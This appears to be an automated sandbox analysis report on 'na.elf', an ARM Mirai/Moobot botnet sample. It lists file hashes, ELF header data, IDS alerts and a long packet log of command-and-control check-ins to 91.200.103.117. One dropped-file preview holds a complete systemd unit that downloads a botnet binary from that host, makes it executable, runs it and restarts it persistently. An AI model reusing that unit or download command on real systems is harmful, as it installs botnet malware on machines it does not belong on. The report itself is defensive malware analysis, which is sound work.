	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.25
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	162.213.35.24
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	na.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
yi0key.heleh.com.vn	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COMBAHTONcombahtonGmbHDE	na.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	na.elf	Get hash	malicious	Mirai, Gafgyt, Moobot, Okiru	Browse	91.200.103.117
	7QiAmg58Jk.exe	Get hash	malicious	Metasploit, Meterpreter, Xmrig	Browse	194.59.31.31
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	194.59.31.225
	9YOOBuBZtj.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.30.201
	6Zx9GI028y.exe	Get hash	malicious	ScreenConnect Tool	Browse	194.59.30.201

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	296
Entropy (8bit):	5.0514883747404
Encrypted:	false
SSDEEP:	6:z80WuKyRZAMzdK+ann0RJ5R0pp+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRS+GWRg+GWRuwjp+GWRut
MD5:	0BD8BD7B39BF18B43F0DF83743017F40
SHA1:	D5AD9A70283FF89F7C2BB7B0FF5F2A4A18EF152E
SHA-256:	C7F82B189E4D250C2E5DE933F3F03D766B2A3BD5A0F7881B822A5F55C6494536
SHA-512:	486F4B7CA2B0E241B42415F70F118A7CE0BBA0143BCCE1334FB9806E29F16A42F4AFD90EB10D99E471926633334988007A93FD46FCF1F2EF852BB90637714E3A
Malicious:	false
Reputation:	low
Preview:	[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetarm.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.NkVkgH (deleted)

Download File

Process:	/tmp/na.elf
File Type:	data
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.8100810205217304
Encrypted:	false
SSDEEP:	3:TgBDlT1N:TgB11N
MD5:	2E8B62CD5B9D6203300E1A0F79554430
SHA1:	B6FC563BCA171C6DFA5A420C367F090C08635F4D
SHA-256:	54E95E1B4FCA83E6C469DA79E05EC42CB5F190B5731F28A9DFF280136B7DCFA6
SHA-512:	81AA2A256AB3B2318A60A089336AB73F5257EF7F292F18A37EC069D7FDE400763D7BFA3D89586B610C80715A2443849E679559EB14DBF7C769869AA908067541
Malicious:	false
Reputation:	low
Preview:	/tmp/na.elf./tmp/nwlrbbmqbh

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	5.582655267042873
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	na.elf
File size:	142'080 bytes
MD5:	47b283fe2b62434075319b4e9ca076de
SHA1:	0b8a05062078824a5c64972d6281d350b5b7ad10
SHA256:	a364e8acff9c109c29a70ea35f6b27cb08ef74cd45fd8418c6e459edbe258b1c
SHA512:	49496c8b4fea6b35a5ca0c7b21ce9e85c076896bfdf6f4d33028a9b68d1a21f7263b7dd221caf95476561ec9a23f37f5e4fda574e32ff2912c7eddc21c774065
SSDEEP:	1536:B5WiGtiNJQv30GQZaBelvC6atxRa2bka4VAb9fTx0kvA23HJLqGE9l5qwywFCFDy:B5Wi0ib8avCTRaA4+BV0kvAkW+9m7p
TLSH:	88D32A45FC415F23C6D612BBFB5E428D372A17A8D2EE72039D216F25378A96B0E37142
File Content Preview:	.ELF...a..........(.........4...p)......4. ...(.....................................................0I..............Q.td..................................-...L."...qm..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x202
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	141680
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x1b5fc	0x0	0x6	AX	16
.fini	PROGBITS	0x236ac	0x1b6ac	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x236c0	0x1b6c0	0x290c	0x0	0x2	A	4
.ctors	PROGBITS	0x2e000	0x1e000	0xc	0x0	0x3	WA	4
.dtors	PROGBITS	0x2e00c	0x1e00c	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x2e020	0x1e020	0x4910	0x0	0x3	WA	32
.bss	NOBITS	0x32930	0x22930	0x86bc	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x22930	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x1dfcc	0x1dfcc	6.0671	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x1e000	0x2e000	0x2e000	0x4930	0xcfec	0.4040	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T16:26:59.723365+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41616	91.200.103.117	23561	TCP
2024-10-07T16:27:04.345846+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41618	91.200.103.117	23561	TCP
2024-10-07T16:27:09.026283+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41620	91.200.103.117	23561	TCP
2024-10-07T16:27:20.647292+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41622	91.200.103.117	23561	TCP
2024-10-07T16:27:24.335242+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41624	91.200.103.117	23561	TCP
2024-10-07T16:27:33.965618+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41626	91.200.103.117	23561	TCP
2024-10-07T16:27:37.604755+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41628	91.200.103.117	23561	TCP
2024-10-07T16:27:46.506480+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41630	91.200.103.117	23561	TCP
2024-10-07T16:27:54.144610+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41632	91.200.103.117	23561	TCP
2024-10-07T16:27:56.766969+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41634	91.200.103.117	23561	TCP
2024-10-07T16:28:04.387884+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41636	91.200.103.117	23561	TCP
2024-10-07T16:28:07.029462+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41638	91.200.103.117	23561	TCP
2024-10-07T16:28:10.818956+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41640	91.200.103.117	23561	TCP
2024-10-07T16:28:13.488128+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41642	91.200.103.117	23561	TCP
2024-10-07T16:28:24.114230+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41644	91.200.103.117	23561	TCP
2024-10-07T16:28:34.803958+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41646	91.200.103.117	23561	TCP
2024-10-07T16:28:43.824060+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41648	91.200.103.117	23561	TCP
2024-10-07T16:28:51.844240+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41650	91.200.103.117	23561	TCP
2024-10-07T16:28:57.507766+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41652	91.200.103.117	23561	TCP
2024-10-07T16:29:00.124032+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41654	91.200.103.117	23561	TCP
2024-10-07T16:29:03.818952+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41656	91.200.103.117	23561	TCP
2024-10-07T16:29:09.456097+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41658	91.200.103.117	23561	TCP
2024-10-07T16:29:21.265138+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41660	91.200.103.117	23561	TCP
2024-10-07T16:29:28.886641+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41662	91.200.103.117	23561	TCP
2024-10-07T16:29:40.562967+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41664	91.200.103.117	23561	TCP
2024-10-07T16:29:45.542576+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41668	91.200.103.117	23561	TCP
2024-10-07T16:29:52.101309+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41670	91.200.103.117	23561	TCP
2024-10-07T16:29:56.715479+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41672	91.200.103.117	23561	TCP
2024-10-07T16:30:08.358601+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41674	91.200.103.117	23561	TCP
2024-10-07T16:30:12.001095+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41676	91.200.103.117	23561	TCP
2024-10-07T16:30:21.695401+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41678	91.200.103.117	23561	TCP
2024-10-07T16:30:28.314262+0200	2030490	ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)	1	192.168.2.15	41680	91.200.103.117	23561	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:26:59.710159063 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:26:59.715035915 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:26:59.715094090 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:26:59.723365068 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:26:59.729959965 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:01.324934959 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:01.325257063 CEST	41616	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:01.330076933 CEST	23561	41616	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:04.337846041 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:04.342880011 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:04.343002081 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:04.345845938 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:04.351459026 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:06.010437965 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:06.011862993 CEST	41618	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:06.016618967 CEST	23561	41618	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:09.020903111 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:09.025732040 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:09.025789976 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:09.026283026 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:09.031056881 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:10.633145094 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:10.633317947 CEST	41620	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:10.638166904 CEST	23561	41620	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:20.641895056 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:20.646696091 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:20.646790981 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:20.647291899 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:20.651993990 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:22.311726093 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:22.311866999 CEST	41622	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:22.317190886 CEST	23561	41622	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:24.329672098 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:24.334520102 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:24.334580898 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:24.335242033 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:24.340060949 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:25.949435949 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:25.949593067 CEST	41624	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:25.954502106 CEST	23561	41624	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:33.959592104 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:33.964394093 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:33.964447975 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:33.965617895 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:33.970364094 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:35.578926086 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:35.579097986 CEST	41626	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:35.583986044 CEST	23561	41626	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:37.599246979 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:37.604125023 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:37.604175091 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:37.604754925 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:37.609673023 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:39.490330935 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:39.490488052 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:39.491662979 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:39.491698027 CEST	41628	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:39.495582104 CEST	23561	41628	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:46.500531912 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:46.505503893 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:46.505587101 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:46.506479979 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:46.511457920 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:48.128330946 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:48.128474951 CEST	41630	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:48.133785963 CEST	23561	41630	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:54.138681889 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:54.143721104 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:54.143783092 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:54.144609928 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:54.149669886 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:55.747867107 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:55.748012066 CEST	41632	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:55.753277063 CEST	23561	41632	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:56.759784937 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:56.765661955 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:56.765738964 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:56.766968966 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:56.773219109 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:58.369185925 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:27:58.369481087 CEST	41634	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:27:58.374380112 CEST	23561	41634	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:04.382319927 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:04.387114048 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:04.387168884 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:04.387883902 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:04.393944025 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:06.014683008 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:06.014856100 CEST	41636	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:06.019731998 CEST	23561	41636	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:07.023863077 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:07.028759003 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:07.028829098 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:07.029462099 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:07.034240961 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:08.655644894 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:08.655829906 CEST	41638	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:08.660629034 CEST	23561	41638	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:10.813182116 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:10.818264961 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:10.818320036 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:10.818955898 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:10.823689938 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:12.473335981 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:12.473470926 CEST	41640	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:12.478471041 CEST	23561	41640	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:13.482592106 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:13.487481117 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:13.487543106 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:13.488127947 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:13.492906094 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:15.089920044 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:15.090172052 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:15.090172052 CEST	41642	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:15.095038891 CEST	23561	41642	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:24.108135939 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:24.113130093 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:24.113212109 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:24.114229918 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:24.119079113 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:25.786721945 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:25.786912918 CEST	41644	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:25.791821957 CEST	23561	41644	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:34.798137903 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:34.803246021 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:34.803304911 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:34.803957939 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:34.808742046 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:34.808823109 CEST	41646	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:34.809238911 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:34.813891888 CEST	23561	41646	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:43.818438053 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:43.823304892 CEST	23561	41648	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:43.823367119 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:43.824059963 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:43.828528881 CEST	23561	41648	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:43.828608036 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:43.828891039 CEST	23561	41648	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:43.833431005 CEST	23561	41648	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:51.838517904 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:51.843497038 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:51.843592882 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:51.844239950 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:51.849040985 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:53.486056089 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:53.486248016 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:53.491142035 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:57.500643969 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:57.505568027 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:57.505655050 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:57.507766008 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:57.512610912 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:59.103934050 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:28:59.104145050 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:28:59.109083891 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:00.118078947 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:00.122870922 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:00.122997046 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:00.124032021 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:00.128846884 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:01.797350883 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:01.797553062 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:01.802520990 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:03.812725067 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:03.817840099 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:03.817908049 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:03.818952084 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:03.823978901 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:05.439291000 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:05.439560890 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:05.444343090 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:09.449635983 CEST	41658	23561	192.168.2.15	91.200.103.117
